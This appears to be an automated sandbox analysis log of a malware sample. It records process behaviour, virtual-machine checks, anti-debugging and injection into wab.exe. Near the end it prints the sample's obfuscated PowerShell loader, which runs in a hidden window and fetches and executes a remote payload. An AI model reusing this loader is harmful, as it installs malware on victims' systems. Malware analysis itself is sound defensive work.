              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 22EA0000 memory reserve | memory write watchJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 23050000 memory reserve | memory write watchJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 22F30000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4673Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5232Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6866Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3019Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 4485Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 5320Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7336Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7824Thread sleep count: 6866 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7828Thread sleep count: 3019 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7856Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1392Thread sleep time: -21213755684765971s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1704Thread sleep count: 4485 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1704Thread sleep count: 5320 > 30Jump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: Amcache.hve.23.drBinary or memory string: VMware
              Source: Amcache.hve.23.drBinary or memory string: VMware Virtual USB Mouse
              Source: Amcache.hve.23.drBinary or memory string: vmci.syshbin
              Source: Amcache.hve.23.drBinary or memory string: VMware, Inc.
              Source: Amcache.hve.23.drBinary or memory string: VMware20,1hbin@
              Source: Amcache.hve.23.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
              Source: Amcache.hve.23.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: Amcache.hve.23.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
              Source: wab.exe, 0000000F.00000002.3121592482.0000000007558000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3121592482.00000000075B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Amcache.hve.23.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.23.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
              Source: Amcache.hve.23.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
              Source: Amcache.hve.23.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: powershell.exe, 00000003.00000002.1892417436.000002AD59C83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: Amcache.hve.23.drBinary or memory string: vmci.sys
              Source: Amcache.hve.23.drBinary or memory string: vmci.syshbin`
              Source: Amcache.hve.23.drBinary or memory string: \driver\vmci,\driver\pci
              Source: Amcache.hve.23.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.23.drBinary or memory string: VMware-42 27 ae 88 8c 2b 21 02-a5 86 22 5b 84 51 ac f0
              Source: Amcache.hve.23.drBinary or memory string: VMware20,1
              Source: Amcache.hve.23.drBinary or memory string: Microsoft Hyper-V Generation Counter
              Source: Amcache.hve.23.drBinary or memory string: NECVMWar VMware SATA CD00
              Source: Amcache.hve.23.drBinary or memory string: VMware Virtual disk SCSI Disk Device
              Source: Amcache.hve.23.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
              Source: Amcache.hve.23.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
              Source: Amcache.hve.23.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
              Source: Amcache.hve.23.drBinary or memory string: VMware PCI VMCI Bus Device
              Source: Amcache.hve.23.drBinary or memory string: VMware VMCI Bus Device
              Source: Amcache.hve.23.drBinary or memory string: VMware Virtual RAM
              Source: Amcache.hve.23.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
              Source: Amcache.hve.23.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: amsi64_4904.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4904, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTR
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4540000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 32AFAACJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Shave = 1;$Stikningens='Sub';$Stikningens+='strin';$Stikningens+='g';Function Sideblikkets($Missel){$Wandoo=$Missel.Length-$Shave;For($Unisexuality=5;$Unisexuality -lt $Wandoo;$Unisexuality+=6){$Berseems+=$Missel.$Stikningens.Invoke( $Unisexuality, $Shave);}$Berseems;}function Mekhitarist($Starchflower){& ($Plukningernes) ($Starchflower);}$Skolekommissionerne=Sideblikkets 'kedelMSepteoAk dezHund.iLivsflAesculBloksaCo ds/ Call5pred,.Tizwi0Liebh P ery(MaalbW.ormaiReklanSonnedNdst.oUneffwNonadsBen.i Obs rNSt.anTApert D cum1Zolao0Sel.k.Raad 0Impen;Blodh N,nclW.aldyiT lelnDagui6Midal4Cicer;genne S.llex ype6 C,ys4 Ord ;Paras ,attr Seigv Trem:a pro1 Dubh2Varme1 Glan.Skand0 Cucu)skatt F adrGUndere OuttcP,litkLandooAspa / Benb2 Genf0Outfi1Crim.0Af.an0Amphi1Warri0Theca1 Komm BosomFUrovaiFar,brBoateeVoco.fAralkoFacadxFysio/ Jess1marke2Ta.sh1Miili. Rang0Store ';$Forvaltningsmyndigheden=Sideblikkets 'Eksp USkr,bslucinePrel,rSkakt-YoghuAP pelgFilt.e haln Endet aks, ';$Disgustful=Sideblikkets ' hedhOverntrothet Ind.p DeacsBlued:Speac/U,clo/ TraswPseudwDaanewProca.Dissis Ras.eStjernPrededRednisTemaspD.fraaIndrec Helle A st.Acentcthorao draem Fed,/Statip,illbrnrbeso A.oc/ExactdBistnl Club/Postuo utscwNiger9fuldf1Stoic4Bisto8Bikag ';$Fangstkvotaer=Sideblikkets 're te> Laur ';$Plukningernes=Sideblikkets 'Sa,spiTapiseHell.xkomma ';$Fertilizables='Indkapslingerne140';$Koden = Sideblikkets ' P gleDtsilc.msvbh S eeo Ex.u digit%Supe,alevi p .erjpStrumdBe ikaStridtDat.taStand%Prokl\BoligTUlykki ForydFaxeheStor,rKokko. P,stDSaturrSoutre over S,ilo&Desig&Rang Kon re Ty.ec ModehSupinoFre e NadintLindi ';Mekhitarist (Sideblikkets 'Machi$ParengFrokolNage oBes.obFormuaKommul Syll:AktioMCloseiForfrsBrig tDonkeeSteg,rGaleo=Falsi(Gan.hcMislam,elatd Trid Busse/,iscocKomme nonsu$UnchaK PileoDoigtdYojane DistnTripl),rrit ');Mekhitarist (Sideblikkets 'Adres$nonbrg TilslStillo TongbHavneaHerrelProle:PinctDFaseraV,sicgIn,ulu haboe LapnrradiorLae,eeJalteoTubert DrifySandwp,nfori LeareStalkn,pildsProbl=Trekv$ZoogeD UmbriF,ftes InspgFlaxwuNon,psMuscatBo,caf dumpuF.renlOrnit.Ra.posPreprpS riel P.opiJerbot Nece(Cauli$Micr,FUnpr.aFr,ngnL,berg Af,us ungst Sk,lk Sph.vSte eoHaanltS,antaKrepeeRyaerrFo,mu),ehan ');$Disgustful=$Daguerreotypiens[0];$Unsingularness= (Sideblikkets 'Dugou$ rosegGreenlPr.yeoCoxswb Nesha HofmlNonbu: Bjf.BKoordesubs,b L.mpu UnkndS.ggeeNyserrBe.senEm greEvn,nsMinds=flaadNHjerte UnslwDoubt- WhitORonkebfunktj,enopeSpo.vcDokumtHym n tilgS FantySmagls yruptFougueKlampmTottl.sondeNDecigeK jsetpaleb.ChlamWFla,keThronbKrofoCPuls,lgordiiglauceBehovnTandbt');$Unsingularness+=$Mister[1];Mekhitarist ($Unsingularness);Mekhitarist (Sideblikkets 'Neg,e$RadioB,ndule HjembIntrauS.cerdNonpeeKabelrBrugen T,leeunhe.sCeteo. ,omiH RegneSk rpaHelvedGa ewe UdstrSupersBomae[Bletr$sandsFSlaveoDummerVentovBr ebakalfalSkulktAbsolnDesilif,rhanSopragAktiesKl mam Mic.yPe,ronIndi d P,gui fy.ig ,avnhPaJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tider.Dre && echo t"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Shave = 1;$Stikningens='Sub';$Stikningens+='strin';$Stikningens+='g';Function Sideblikkets($Missel){$Wandoo=$Missel.Length-$Shave;For($Unisexuality=5;$Unisexuality -lt $Wandoo;$Unisexuality+=6){$Berseems+=$Missel.$Stikningens.Invoke( $Unisexuality, $Shave);}$Berseems;}function Mekhitarist($Starchflower){& ($Plukningernes) ($Starchflower);}$Skolekommissionerne=Sideblikkets 'kedelMSepteoAk dezHund.iLivsflAesculBloksaCo ds/ Call5pred,.Tizwi0Liebh P ery(MaalbW.ormaiReklanSonnedNdst.oUneffwNonadsBen.i Obs rNSt.anTApert D cum1Zolao0Sel.k.Raad 0Impen;Blodh N,nclW.aldyiT lelnDagui6Midal4Cicer;genne S.llex ype6 C,ys4 Ord ;Paras ,attr Seigv Trem:a pro1 Dubh2Varme1 Glan.Skand0 Cucu)skatt F adrGUndere OuttcP,litkLandooAspa / Benb2 Genf0Outfi1Crim.0Af.an0Amphi1Warri0Theca1 Komm BosomFUrovaiFar,brBoateeVoco.fAralkoFacadxFysio/ Jess1marke2Ta.sh1Miili. Rang0Store ';$Forvaltningsmyndigheden=Sideblikkets 'Eksp USkr,bslucinePrel,rSkakt-YoghuAP pelgFilt.e haln Endet aks, ';$Disgustful=Sideblikkets ' 